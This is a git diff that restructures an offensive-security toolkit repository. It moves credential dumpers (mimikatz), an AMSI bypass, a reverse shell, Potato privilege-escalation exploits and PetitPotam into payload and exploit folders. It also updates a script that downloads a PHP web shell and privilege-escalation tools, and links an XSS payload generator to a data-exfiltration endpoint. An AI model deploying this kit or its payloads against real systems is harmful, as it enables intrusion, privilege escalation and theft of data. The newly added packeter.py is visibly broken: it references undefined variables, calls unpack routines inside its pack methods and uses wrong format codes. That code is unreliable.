a/win/JuicyPotato.exe b/payloads/windows/JuicyPotato.exe similarity index 100% rename from win/JuicyPotato.exe rename to payloads/windows/JuicyPotato.exe diff --git a/win/JuicyPotato64.exe b/payloads/windows/JuicyPotato64.exe similarity index 100% rename from win/JuicyPotato64.exe rename to payloads/windows/JuicyPotato64.exe diff --git a/win/Out-Minidump.ps1 b/payloads/windows/Out-Minidump.ps1 similarity index 100% rename from win/Out-Minidump.ps1 rename to payloads/windows/Out-Minidump.ps1 diff --git a/PetitPotam.py b/payloads/windows/PetitPotam.py similarity index 100% rename from PetitPotam.py rename to payloads/windows/PetitPotam.py diff --git a/win/PowerView.ps1 b/payloads/windows/PowerView.ps1 similarity index 100% rename from win/PowerView.ps1 rename to payloads/windows/PowerView.ps1 diff --git a/win/Powermad.ps1 b/payloads/windows/Powermad.ps1 similarity index 100% rename from win/Powermad.ps1 rename to payloads/windows/Powermad.ps1 diff --git a/win/PrintSpoofer.exe b/payloads/windows/PrintSpoofer.exe similarity index 100% rename from win/PrintSpoofer.exe rename to payloads/windows/PrintSpoofer.exe diff --git a/win/PsExec64.exe b/payloads/windows/PsExec64.exe similarity index 100% rename from win/PsExec64.exe rename to payloads/windows/PsExec64.exe diff --git a/win/Rubeus.exe b/payloads/windows/Rubeus.exe similarity index 100% rename from win/Rubeus.exe rename to payloads/windows/Rubeus.exe diff --git a/win/Seatbelt.exe b/payloads/windows/Seatbelt.exe similarity index 100% rename from win/Seatbelt.exe rename to payloads/windows/Seatbelt.exe diff --git a/win/SharpDPAPI.exe b/payloads/windows/SharpDPAPI.exe similarity index 100% rename from win/SharpDPAPI.exe rename to payloads/windows/SharpDPAPI.exe diff --git a/win/SharpGPOAbuse.exe b/payloads/windows/SharpGPOAbuse.exe similarity index 100% rename from win/SharpGPOAbuse.exe rename to payloads/windows/SharpGPOAbuse.exe diff --git a/win/SharpHound.exe b/payloads/windows/SharpHound.exe similarity index 100% rename from win/SharpHound.exe rename to payloads/windows/SharpHound.exe diff --git a/win/SharpHound.ps1 b/payloads/windows/SharpHound.ps1 similarity index 100% rename from win/SharpHound.ps1 rename to payloads/windows/SharpHound.ps1 diff --git a/win/SweetPotato.exe b/payloads/windows/SweetPotato.exe similarity index 100% rename from win/SweetPotato.exe rename to payloads/windows/SweetPotato.exe diff --git a/win/accesschk.exe b/payloads/windows/accesschk.exe similarity index 100% rename from win/accesschk.exe rename to payloads/windows/accesschk.exe diff --git a/win/accesschk64.exe b/payloads/windows/accesschk64.exe similarity index 100% rename from win/accesschk64.exe rename to payloads/windows/accesschk64.exe diff --git a/win/amsi-bypass.ps1 b/payloads/windows/amsi-bypass.ps1 similarity index 100% rename from win/amsi-bypass.ps1 rename to payloads/windows/amsi-bypass.ps1 diff --git a/win/aspx-reverse-shell.aspx b/payloads/windows/aspx-reverse-shell.aspx similarity index 100% rename from win/aspx-reverse-shell.aspx rename to payloads/windows/aspx-reverse-shell.aspx diff --git a/win/chisel.exe b/payloads/windows/chisel.exe similarity index 100% rename from win/chisel.exe rename to payloads/windows/chisel.exe diff --git a/win/chisel64.exe b/payloads/windows/chisel64.exe similarity index 100% rename from win/chisel64.exe rename to payloads/windows/chisel64.exe diff --git a/win/kekeo.exe b/payloads/windows/kekeo.exe similarity index 100% rename from win/kekeo.exe rename to payloads/windows/kekeo.exe diff --git a/win/mimidrv64.sys b/payloads/windows/mimidrv64.sys similarity index 100% rename from win/mimidrv64.sys rename to payloads/windows/mimidrv64.sys diff --git a/win/mimikatz.exe b/payloads/windows/mimikatz.exe similarity index 100% rename from win/mimikatz.exe rename to payloads/windows/mimikatz.exe diff --git a/win/mimikatz64.exe b/payloads/windows/mimikatz64.exe similarity index 100% rename from win/mimikatz64.exe rename to payloads/windows/mimikatz64.exe diff --git a/win/nc.exe b/payloads/windows/nc.exe similarity index 100% rename from win/nc.exe rename to payloads/windows/nc.exe diff --git a/win/nc64.exe b/payloads/windows/nc64.exe similarity index 100% rename from win/nc64.exe rename to payloads/windows/nc64.exe diff --git a/win/nmap-setup.exe b/payloads/windows/nmap-setup.exe similarity index 100% rename from win/nmap-setup.exe rename to payloads/windows/nmap-setup.exe diff --git a/win/passthecert.py b/payloads/windows/passthecert.py similarity index 100% rename from win/passthecert.py rename to payloads/windows/passthecert.py diff --git a/win/plink.exe b/payloads/windows/plink.exe similarity index 100% rename from win/plink.exe rename to payloads/windows/plink.exe diff --git a/win/plink64.exe b/payloads/windows/plink64.exe similarity index 100% rename from win/plink64.exe rename to payloads/windows/plink64.exe diff --git a/win/powercat.ps1 b/payloads/windows/powercat.ps1 similarity index 100% rename from win/powercat.ps1 rename to payloads/windows/powercat.ps1 diff --git a/win/procdump64.exe b/payloads/windows/procdump64.exe similarity index 100% rename from win/procdump64.exe rename to payloads/windows/procdump64.exe diff --git a/win/socat.exe b/payloads/windows/socat.exe similarity index 100% rename from win/socat.exe rename to payloads/windows/socat.exe diff --git a/win/socat64.exe b/payloads/windows/socat64.exe similarity index 100% rename from win/socat64.exe rename to payloads/windows/socat64.exe diff --git a/win/winPEAS.bat b/payloads/windows/winPEAS.bat similarity index 97% rename from win/winPEAS.bat rename to payloads/windows/winPEAS.bat index e4c1d23..4a7c73c 100644 --- a/win/winPEAS.bat +++ b/payloads/windows/winPEAS.bat @@ -58,6 +58,8 @@ CALL :ColorLine " %E%41mWinPEAS should be used for authorized penetration test CALL :ColorLine " %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m" CALL :ColorLine " %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m" ECHO. +ECHO. [i] Best Linux PE and hardening course: https://hacktricks-training.com/courses/lhe/ +ECHO. :SystemInfo CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO" @@ -71,7 +73,7 @@ CALL :T_Progress 2 :ListHotFixes where wmic >nul 2>&1 if %errorlevel% equ 0 ( - wmic qfe get Caption,Description,HotFixID,InstalledOn | more + wmic qfe get Caption,Description,HotFixID,InstalledOn ) else ( powershell -command "Get-HotFix | Format-Table -AutoSize" ) @@ -204,7 +206,7 @@ CALL :T_Progress 1 CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)" where wmic >nul 2>&1 if %errorlevel% equ 0 ( - WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more + WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List ) else ( powershell -command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName" ) @@ -238,7 +240,7 @@ CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS" ECHO. [i] Maybe you find something interesting where wmic >nul 2>&1 if %errorlevel% equ 0 ( - wmic logicaldisk get caption | more + wmic logicaldisk get caption ) else ( fsutil fsinfo drives ) @@ -405,7 +407,7 @@ CALL :T_Progress 1 :BasicUserInfo CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO -ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege +ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege ECHO. [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups ECHO. CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" @@ -670,7 +672,7 @@ if "%long%" == "true" ( ECHO. where wmic >nul 2>&1 if !errorlevel! equ 0 ( - for /f %%x in ('wmic logicaldisk get name ^| more') do ( + for /f %%x in ('wmic logicaldisk get name') do ( set tdrive=%%x if "!tdrive:~1,2!" == ":" ( %%x diff --git a/win/winPEAS.exe b/payloads/windows/winPEAS.exe similarity index 80% rename from win/winPEAS.exe rename to payloads/windows/winPEAS.exe index f2df732..06cd07f 100644 Binary files a/win/winPEAS.exe and b/payloads/windows/winPEAS.exe differ diff --git a/win/winPEASx64.exe b/payloads/windows/winPEASx64.exe similarity index 80% rename from win/winPEASx64.exe rename to payloads/windows/winPEASx64.exe index dfff66f..29984db 100644 Binary files a/win/winPEASx64.exe and b/payloads/windows/winPEASx64.exe differ diff --git a/win/windows-exploit-suggester.py b/payloads/windows/windows-exploit-suggester.py similarity index 100% rename from win/windows-exploit-suggester.py rename to payloads/windows/windows-exploit-suggester.py diff --git a/win/ysoserial/NDesk.Options.dll b/payloads/windows/ysoserial/NDesk.Options.dll similarity index 100% rename from win/ysoserial/NDesk.Options.dll rename to payloads/windows/ysoserial/NDesk.Options.dll diff --git a/win/ysoserial/ysoserial.exe b/payloads/windows/ysoserial/ysoserial.exe similarity index 100% rename from win/ysoserial/ysoserial.exe rename to payloads/windows/ysoserial/ysoserial.exe diff --git a/win/PetitPotam.py b/tools/exploits/PetitPotam.py old mode 100644 new mode 100755 similarity index 100% rename from win/PetitPotam.py rename to tools/exploits/PetitPotam.py diff --git a/git-dumper.py b/tools/exploits/git-dumper.py similarity index 100% rename from git-dumper.py rename to tools/exploits/git-dumper.py diff --git a/padBuster.pl b/tools/exploits/padBuster.pl similarity index 100% rename from padBuster.pl rename to tools/exploits/padBuster.pl diff --git a/rev_shell.py b/tools/exploits/rev_shell.py similarity index 99% rename from rev_shell.py rename to tools/exploits/rev_shell.py index 008d4c1..3b151cd 100755 --- a/rev_shell.py +++ b/tools/exploits/rev_shell.py @@ -5,8 +5,6 @@ import os import re import sys import pty -import util -import upload_file import time import random import threading @@ -16,6 +14,9 @@ import select import argparse import signal +from hackingscripts.utils import util +from hackingscripts.tools.misc import upload_file + try: import SocketServer except ImportError: diff --git a/ssh-check-username.py b/tools/exploits/ssh-check-username.py similarity index 100% rename from ssh-check-username.py rename to tools/exploits/ssh-check-username.py diff --git a/xp_cmdshell.py b/tools/exploits/xp_cmdshell.py similarity index 100% rename from xp_cmdshell.py rename to tools/exploits/xp_cmdshell.py diff --git a/crack_hash.py b/tools/misc/crack_hash.py similarity index 100% rename from crack_hash.py rename to tools/misc/crack_hash.py diff --git a/find_git_commit.py b/tools/misc/find_git_commit.py similarity index 100% rename from find_git_commit.py rename to tools/misc/find_git_commit.py diff --git a/pcap_file_extract.py b/tools/misc/pcap_file_extract.py similarity index 100% rename from pcap_file_extract.py rename to tools/misc/pcap_file_extract.py diff --git a/recursive_download.py b/tools/misc/recursive_download.py similarity index 100% rename from recursive_download.py rename to tools/misc/recursive_download.py diff --git a/tools/misc/tcp_template.py b/tools/misc/tcp_template.py new file mode 100644 index 0000000..e7f6163 --- /dev/null +++ b/tools/misc/tcp_template.py @@ -0,0 +1,118 @@ +#!/usr/bin/env python + +import re +import sys +import json +import argparse +import urllib.parse + +def generate_template(listen_address, listen_port, remote_host, remote_port): + + # we could all need that + imports = [ + "os", + "socket", + "threading" + ] + + partial_imports = { + "hackingscripts.utils": ["util"], + "hackingscripts.utils.packeter": ["Packer", "Parser"] + } + + imports = "\n".join(f"import {i}" for i in sorted(imports, key=len)) + imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len)) + return f"""#!/usr/bin/env python + +# +# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)} +# For more information, visit: https://git.romanh.de/Roman/HackingScripts +# + +{imports} + +BUFFER_SIZE = 4096 + +class Packet: + def __init__(self): + pass + + @staticmethod + def from_data(data): + packet = Packet() + parser = Parser(data) + # TODO: auto-generated method stub + return packet + + def pack(self): + buf = Packer() + # TODO: auto-generated method stub + return buf.get() + +def forward(source, destination): + try: + while True: + data = source.recv(BUFFER_SIZE) + if not data: + break + + # TODO: Parse / Manipulate packet + # packet = Packet.from_data(data) + # repacked = packet.pack() + + destination.sendall(data) + except Exception: + pass + finally: + source.close() + destination.close() + +def handle_client(client_socket, remote_host, remote_port): + try: + remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + remote_socket.connect((remote_host, remote_port)) + except Exception as e: + print(f"Failed to connect to remote: {{e}}") + client_socket.close() + return + + # Start bidirectional forwarding + threading.Thread(target=forward, args=(client_socket, remote_socket), daemon=True).start() + threading.Thread(target=forward, args=(remote_socket, client_socket), daemon=True).start() + +def start_proxy(local_host, local_port, remote_host, remote_port): + server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + server.bind((local_host, local_port)) + server.listen(100) + + print(f"[*] Forwarding from {{local_host}}:{{local_port}} to {{remote_host}}:{{remote_port}}") + + while True: + client_socket, addr = server.accept() + print(f"[+] Connection from {{addr[0]}}:{{addr[1]}}") + threading.Thread( + target=handle_client, + args=(client_socket, remote_host, remote_port), + daemon=True + ).start() + +if __name__ == "__main__": + start_proxy({repr(listen_address)}, {listen_port}, {repr(remote_host)}, {remote_port}) +""" + +if __name__ == "__main__": + + parser = argparse.ArgumentParser( + description="Exploit Template for tcp application attacks", + formatter_class=argparse.RawTextHelpFormatter + ) + + parser.add_argument("la", type=str, help="Listen Address") + parser.add_argument("lp", type=int, help="Listen Port", choices=range(1,65535+1)) + parser.add_argument("rh", type=str, help="Remote Host") + parser.add_argument("rp", type=int, help="Remote Port", choices=range(1,65535+1)) + + args = parser.parse_args() + template = generate_template(args.la, args.lp, args.rh, args.rp) + print(template) diff --git a/upload_file.py b/tools/misc/upload_file.py similarity index 97% rename from upload_file.py rename to tools/misc/upload_file.py index f65e805..f99ba52 100755 --- a/upload_file.py +++ b/tools/misc/upload_file.py @@ -2,9 +2,10 @@ import sys import os -import util import argparse +from hackingscripts.utils import util + def serve_file(listen_sock, path, forever=False): try: while True: diff --git a/template.py b/tools/misc/web_template.py similarity index 98% rename from template.py rename to tools/misc/web_template.py index 5b289d5..63ed977 100755 --- a/template.py +++ b/tools/misc/web_template.py @@ -17,7 +17,8 @@ def generate_template(base_url, features): partial_imports = { "bs4": ["BeautifulSoup"], - "hackingscripts": ["util", "rev_shell"], + "hackingscripts.utils": ["util"], + "hackingscripts.tools.exploits": ["rev_shell"], "urllib3.exceptions": ["InsecureRequestWarning"] } diff --git a/crawl_urls.py b/tools/scanner/crawl_urls.py similarity index 100% rename from crawl_urls.py rename to tools/scanner/crawl_urls.py diff --git a/first_scan.sh b/tools/scanner/first_scan.sh similarity index 100% rename from first_scan.sh rename to tools/scanner/first_scan.sh diff --git a/gobuster.sh b/tools/scanner/gobuster.sh similarity index 100% rename from gobuster.sh rename to tools/scanner/gobuster.sh diff --git a/phpinfo-analyzer.py b/tools/scanner/phpinfo-analyzer.py similarity index 100% rename from phpinfo-analyzer.py rename to tools/scanner/phpinfo-analyzer.py diff --git a/subdomainFuzz.sh b/tools/scanner/subdomainFuzz.sh similarity index 100% rename from subdomainFuzz.sh rename to tools/scanner/subdomainFuzz.sh diff --git a/dnsserver.py b/tools/server/dnsserver.py old mode 100644 new mode 100755 similarity index 100% rename from dnsserver.py rename to tools/server/dnsserver.py diff --git a/ftpserver.py b/tools/server/ftpserver.py old mode 100644 new mode 100755 similarity index 100% rename from ftpserver.py rename to tools/server/ftpserver.py diff --git a/smtpserver.py b/tools/server/smtpserver.py old mode 100644 new mode 100755 similarity index 100% rename from smtpserver.py rename to tools/server/smtpserver.py diff --git a/sshserver.py b/tools/server/sshserver.py old mode 100644 new mode 100755 similarity index 100% rename from sshserver.py rename to tools/server/sshserver.py diff --git a/fileserver.py b/tools/server/webserver.py similarity index 98% rename from fileserver.py rename to tools/server/webserver.py index 53db2ea..82d1996 100755 --- a/fileserver.py +++ b/tools/server/webserver.py @@ -1,14 +1,15 @@ #!/usr/bin/env python import argparse -from http.server import BaseHTTPRequestHandler, HTTPServer -from urllib.parse import urlparse import threading import requests import time import os import ssl -import util +from http.server import BaseHTTPRequestHandler, HTTPServer +from urllib.parse import urlparse +from hackingscripts.utils import util +from hackingscripts.tools.server.xss_handler import generate_payload as generate_xss_payload class FileServerRequestHandler(BaseHTTPRequestHandler): @@ -357,7 +358,6 @@ if __name__ == "__main__": file_server.forwardRequest("/proxy", url) print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address)) elif args.action == "xss": - from xss_handler import generate_payload as generate_xss_payload payload_type = args.payload if args.payload else "img" xss = generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address)) file_server.addFile("/xss", xss) diff --git a/xss_handler.py b/tools/server/xss_handler.py similarity index 100% rename from xss_handler.py rename to tools/server/xss_handler.py diff --git a/update.sh b/update.sh index 6c50e8b..1750f6a 100755 --- a/update.sh +++ b/update.sh @@ -39,26 +39,25 @@ get_latest_version () { } echo "Updating scripts…" -download https://raw.githubusercontent.com/initstring/uptux/master/uptux.py uptux.py -download https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh unix-privesc-check.sh -download https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 pspy64 -download https://github.com/DominicBreuker/pspy/releases/latest/download/pspy32 pspy -download https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php p0wny-shell.php -download https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh lse.sh -download https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh linux-exploit-suggester.sh -download https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh LinEnum.sh -download https://github.com/stealthcopter/deepce/raw/main/deepce.sh deepce.sh -download https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py PetitPotam.py +download https://raw.githubusercontent.com/initstring/uptux/master/uptux.py payloads/linux/uptux.py +download https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh payloads/linux/unix-privesc-check.sh +download https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 payloads/linux/pspy64 +download https://github.com/DominicBreuker/pspy/releases/latest/download/pspy32 payloads/linux/pspy +download https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php payloads/web/p0wny-shell.php +download https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh payloads/linux/lse.sh +download https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh payloads/linux/linux-exploit-suggester.sh +download https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh payloads/linux/LinEnum.sh +download https://github.com/stealthcopter/deepce/raw/main/deepce.sh payloads/linux/deepce.sh echo "" echo "Updating LinPEAS + WinPEAS…" peas_version=$(get_latest_version peass-ng/PEASS-ng) if [ ! -z "$peas_version" ]; then echo "Got PEAS version: $peas_version" - download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/linpeas.sh linpeas.sh - download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEASx86.exe win/winPEAS.exe - download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEASx64.exe win/winPEASx64.exe - download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEAS.bat win/winPEAS.bat + download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/linpeas.sh payloads/linux/linpeas.sh + download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEASx86.exe payloads/windows/winPEAS.exe + download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEASx64.exe payloads/windows/winPEASx64.exe + download https://github.com/peass-ng/PEASS-ng/releases/download/$peas_version/winPEAS.bat payloads/windows/winPEAS.bat else echo "Unable to determine latest PEAS version" fi @@ -66,24 +65,24 @@ fi # TODO: add others echo "" echo "Updating windows tools…" -download https://live.sysinternals.com/accesschk.exe win/accesschk.exe -download https://live.sysinternals.com/accesschk64.exe win/accesschk64.exe -download https://github.com/int0x33/nc.exe/raw/master/nc.exe win/nc.exe -download https://github.com/int0x33/nc.exe/raw/master/nc64.exe win/nc64.exe -download https://github.com/k4sth4/Juicy-Potato/raw/main/x86/jp32.exe win/JuicyPotato.exe -download https://github.com/k4sth4/Juicy-Potato/raw/main/x64/jp.exe win/JuicyPotato64.exe -download https://github.com/uknowsec/SweetPotato/raw/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe win/SweetPotato.exe -download https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe win/GodPotato.exe -download https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py win/PetitPotam.py +download https://live.sysinternals.com/accesschk.exe payloads/windows/accesschk.exe +download https://live.sysinternals.com/accesschk64.exe payloads/windows/accesschk64.exe +download https://github.com/int0x33/nc.exe/raw/master/nc.exe payloads/windows/nc.exe +download https://github.com/int0x33/nc.exe/raw/master/nc64.exe payloads/windows/nc64.exe +download https://github.com/k4sth4/Juicy-Potato/raw/main/x86/jp32.exe payloads/windows/JuicyPotato.exe +download https://github.com/k4sth4/Juicy-Potato/raw/main/x64/jp.exe payloads/windows/JuicyPotato64.exe +download https://github.com/uknowsec/SweetPotato/raw/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe payloads/windows/SweetPotato.exe +download https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe payloads/windows/GodPotato.exe +download https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py tools/exploits/PetitPotam.py echo "" chisel_version=$(get_latest_version jpillora/chisel v) if [ ! -z "$chisel_version" ]; then echo "Got Chisel version: $chisel_version" - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > chisel - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > chisel64 - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_386.gz" | gzip -d > win/chisel.exe - curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_amd64.gz" | gzip -d > win/chisel64.exe + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > payloads/linux/chisel + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > payloads/linux/chisel64 + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_386.gz" | gzip -d > payloads/windows/chisel.exe + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_amd64.gz" | gzip -d > payloads/windows/chisel64.exe else echo "Unable to determine latest chisel version" fi @@ -91,14 +90,14 @@ fi sharphound_version=$(get_latest_version BloodHoundAD/SharpHound v) if [ ! -z "$sharphound_version" ]; then echo "Got Sharphound version: $sharphound_version" - download_zip https://github.com/BloodHoundAD/SharpHound/releases/download/v${sharphound_version}/SharpHound-v${sharphound_version}.zip win/ SharpHound.exe SharpHound.ps1 + download_zip https://github.com/BloodHoundAD/SharpHound/releases/download/v${sharphound_version}/SharpHound-v${sharphound_version}.zip payloads/windows/ SharpHound.exe SharpHound.ps1 fi socat_version=$(get_latest_version "3ndG4me/socat" v) if [ ! -z "$socat_version" ]; then echo "Got socat version: $socat_version" - download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx86.bin socat - download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx64.bin socat64 - download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx86.exe win/socat.exe - download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx64.exe win/socat64.exe + download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx86.bin payloads/linux/socat + download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx64.bin payloads/linux/socat64 + download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx86.exe payloads/windows/socat.exe + download https://github.com/3ndG4me/socat/releases/download/v${socat_version}/socatx64.exe payloads/windows/socat64.exe fi \ No newline at end of file diff --git a/utils/__init__.py b/utils/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/crypto_cookie.py b/utils/crypto_cookie.py similarity index 100% rename from crypto_cookie.py rename to utils/crypto_cookie.py diff --git a/utils/packeter.py b/utils/packeter.py new file mode 100644 index 0000000..14608ba --- /dev/null +++ b/utils/packeter.py @@ -0,0 +1,133 @@ +import struct + +class StructWrapper: + @staticmethod + def _endian(e): + return ">" if e else "<" + + @staticmethod + def _format_size(f): + format_sizes = { + "c": 1, + "h": 2, "H": 2, + "i": 4, "I": 4, + "q": 8, "Q": 8, + } + + assert f in format_sizes + return format_sizes[f] + +class Parser(StructWrapper): + def __init__(self, data, big_endian=False): + self.data = data + self.offset = 0 + self.big_endian = big_endian + + def eof(self): + return self.offset >= len(self.data) + + def remaining_size(self): + return len(self.data[self.offset:]) + + def _struct_unpack(self, big_endian, f): + size = self._format_size(f) + assert self.remaining_size() >= size + + # grab default endianess, when none is given + if big_endian is None: + big_endian = self.big_endian + + value = struct.unpack(self._endian(big_endian) + f, self.data[self.offset:self.offset+size])[0] + self.offset += size + return value + + def read_byte(self): + return self._struct_unpack(big_endian, "c") + + def read_char(self): + return chr(self.read_byte()) + + def read_signed_short(self, big_endian=None): + return self._struct_unpack(big_endian, "h") + + def read_unsigned_short(self, big_endian=None): + return self._struct_unpack(big_endian, "H") + + def read_signed_int(self, big_endian=None): + return self._struct_unpack(big_endian, "i") + + def read_unsigned_int(self, big_endian=None): + return self._struct_unpack(big_endian, "I") + + def read_signed_long(self, big_endian=None): + return self._struct_unpack(big_endian, "q") + + def read_unsigned_long(self, big_endian=None): + return self._struct_unpack(big_endian, "Q") + + def read_bin(self, length): + d = self.data[self.offset:self.offset+length] + assert len(self.data[self.offset:]) >= length + self.offset += length + return d + + def read_until(self, byte): + data = b"" + while not self.eof(): + c = self.read_byte() + if c == byte: + break + data += c + return data + +class Packer(StructWrapper): + def __init__(self, big_endian=False): + self.buffer = b"" + self.offset = 0 + self.big_endian = big_endian + + def get(self): + return self.buffer + + def length(self): + return len(self.buffer) + + def _struct_pack(self, big_endian, f, value): + # grab default endianess, when none is given + if big_endian is None: + big_endian = self.big_endian + + size = self._format_size(f) + self.buffer += struct.pack(self._endian(big_endian) + f, value) + self.offset += size + + def write_byte(self, value): + self._struct_pack(big_endian, "c", value) + + def write_char(self, value): + self._struct_pack(big_endian, "c", value.encode()) + + def write_signed_short(self, value, big_endian=None): + self._struct_pack(big_endian, "c", value) + + def write_unsigned_short(self, value, big_endian=None): + self._struct_pack(big_endian, "H", value) + + def write_signed_int(self, value, big_endian=None): + self._struct_unpack(big_endian, "i", value) + + def write_unsigned_int(self, value, big_endian=None): + self._struct_unpack(big_endian, "I", value) + + def write_signed_long(self, value, big_endian=None): + self._struct_unpack(big_endian, "q", value) + + def rwrite_unsigned_long(self, value, big_endian=None): + self._struct_unpack(big_endian, "Q", value) + + def write_bin(self, value): + self.buffer += value + self.offset += len(value) + + def write_string(self, value, encoding="UTF-8"): + self.write_bin(value.encode(encoding)) \ No newline at end of file diff --git a/sqli.py b/utils/sqli.py similarity index 100% rename from sqli.py rename to utils/sqli.py diff --git a/util.py b/utils/util.py similarity index 95% rename from util.py rename to utils/util.py index 89dee9a..b08683f 100755 --- a/util.py +++ b/utils/util.py @@ -14,6 +14,18 @@ import re import json import urllib.parse +def hex_dump(data, column_size=16): + printables = (string.ascii_letters + string.digits + string.punctuation).encode() + for i in range(0, len(data), column_size): + row = data[i:i+column_size] + as_string = "".join("." if bytes([b]) not in printables else chr(b) for b in row) + as_hex = " ".join("%02x" % b for b in row) + + if len(row) < column_size: + as_hex += " " * 3 * (column_size - len(row)) + + print("%08x" % (i * column_size), "|", as_hex, "|", as_string) + def is_port_in_use(port): import socket with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: @@ -158,12 +170,11 @@ def assert_regex_match(pattern, data, err=None): err = f"[-] Data does not match pattern '{pattern}': '{data}'" if err is None else err exit_with_error(None, err) -def open_server(address, ports=None, retry=True): +def open_server(address, ports=None, retry=False): listen_port = None sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - while retry: - + while True: if isinstance(ports, int): listen_port = ports retry = False @@ -173,13 +184,16 @@ def open_server(address, ports=None, retry=True): listen_port = random.randint(10000,65535) try: + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((address, listen_port)) sock.listen(1) return sock except Exception as e: - if not retry: - print("[-] Unable to listen on port %d: %s" % (listenPort, str(e))) - raise e + if retry: + print("[-] Unable to listen on port %d: %s, Retrying…" % (listen_port, str(e))) + time.sleep(1.0) + else: + raise e class Stack: def __init__(self, start_address, word_size=8): diff --git a/web_service_finder.py b/web_service_finder.py deleted file mode 100755 index 44fa88a..0000000 --- a/web_service_finder.py +++ /dev/null @@ -1,273 +0,0 @@ -#!/usr/bin/env python - -import re -import sys -import json -import argparse -import requests -import urllib.parse -import util -from bs4 import BeautifulSoup -from crawl_urls import Crawler - -requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) - -class WebServiceFinder: - - def __init__(self, args): - self.parseUrl(args.url) - self.parseCookies(args.cookie) - self.headers = { } - self.session = requests.Session() - self.verbose = args.verbose - - if args.user_agent: - self.headers["User-Agent"] = args.user_agent - - def parseUrl(self, url): - parts = urllib.parse.urlparse(url) - if parts.scheme == '': - self.url = "http://" + url - self.scheme = "http" 